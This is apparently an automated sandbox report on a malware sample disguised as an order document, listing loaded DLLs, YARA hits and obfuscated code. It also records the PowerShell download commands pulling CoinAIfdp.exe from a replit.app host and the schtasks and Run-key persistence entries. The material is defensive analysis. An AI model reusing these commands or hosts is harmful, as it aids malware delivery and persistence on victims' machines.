              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Order._1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: CoinAI.pdb source: CoinAIfdp.exe, 00000006.00000002.1491080442.000000000401B000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000000.1413986233.0000000000C72000.00000002.00000001.01000000.00000005.sdmp, CoinAIfdp.exe.5.dr, svchst.exe.6.dr

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Order._1.exeUnpacked PE file: 0.2.Order._1.exe.400000.0.unpack
              Source: Yara matchFile source: Order._1.exe, type: SAMPLE
              Source: Yara matchFile source: 0.2.Order._1.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.Order._1.exe.400000.0.unpack, type: UNPACKEDPE
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, cl5fowJh7yxNN2fIgNI.cs.Net Code: Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777343)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777247)),Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777299))})
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
              Source: CoinAIfdp.exe.5.drStatic PE information: 0xF68E0DF4 [Sun Jan 30 05:07:00 2101 UTC]
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
              Source: Order._1.exeStatic PE information: section name: .code
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058835AF push eax; ret 6_2_058835B9
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588240E push eax; ret 6_2_05882422
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_05881EF3 push 0000003Eh; retn 0000h6_2_0588224D
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049C36D7 push ebx; iretd 13_2_049C36DA
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_027036D7 push ebx; iretd 15_2_027036DA
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04FE36D7 push ebx; iretd 16_2_04FE36DA
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_01636AFD push ecx; retf 17_2_01636ABE
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_030136D7 push ebx; iretd 17_2_030136DA
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, -Module--6c44aef7-a768-4888-a433-d85c5ad109cb-.csHigh entropy of concatenated method names: 'ed259c4241c584c7d8ab38c9e6495f52e', 'aLlqhjjNuq4OZAFnvIu', 'EXXyfUjYNp6ChnXULQN', 's2rXy3jQd7ThR5VCfHP', 'yJmnnDjqGv0nUip5CBt', 'bx1t0TjSMiVc0V3dsgq'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csHigh entropy of concatenated method names: 'cDuVN5WPQV5pvpZjMxp', 'cEidBdWttxUi3uZDUFR', 'd2gRg0Ore5', 'qHkN85W427RgXUEk2bl', 'b5VrLjW96mcc37NbJ2i', 'QCBCPcWmd9heh3hgxs1', 'vvbxNjWDUNfHKynjokX', 'f6knqCW3JVm8U8wIos7', 'mPfe2CW7LfltdC3f1RG', 'HDCBXfWdwxDlos17nNc'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, IFrcn0KXLJxTL67p1k.csHigh entropy of concatenated method names: 'BEBYFA3kO', 'nrHQhZmJn', 'JpUqoG1vn', 'Ep5SnocFp', 'M2sF8noCm', 'vFdw2AVJT', 'fVRWs1k7f', 'df1iXgVkR', 'JEQTCyrn5', 'nIAy3A5qe'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, Form1.csHigh entropy of concatenated method names: 'xhdf4A1bo', 'Dispose', 'ofEjFq0yp', 'FBrSExWXpsKqmLpoDZl', 'AcyVQ5WrUl5mU5RsjAJ', 'jGit5bWsUfQr6MnSM8c', 'Rtb2qvWRmnediMp1tYr', 'j5M3eUWCB3TnqeEVNp4', 'rUIxgNWlrx212YD3iGB', 'VnHoPZW1npsaNKkTg1h'
              Source: 6.2.CoinAIfdp.exe.401bef0.1.raw.unpack, wLHv7QXFZdocIWtp0bP.csHigh entropy of concatenated method names: 'yJuMqZ28ag', 'ifLMSEC7e6', 'a5OMFO86av', 'MSBMwraFNb', 'W0KMW9uaDi', 'GhpMiRcvQG', 'E3QMTS0iol', 'GD5XDY8EdE', 'gruMyqey39', 'LPVM0bVt1j'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile created: C:\Users\user\AppData\Roaming\svchst.exeJump to dropped file

              Boot Survival

              barindex
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
              Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
              Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
              Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
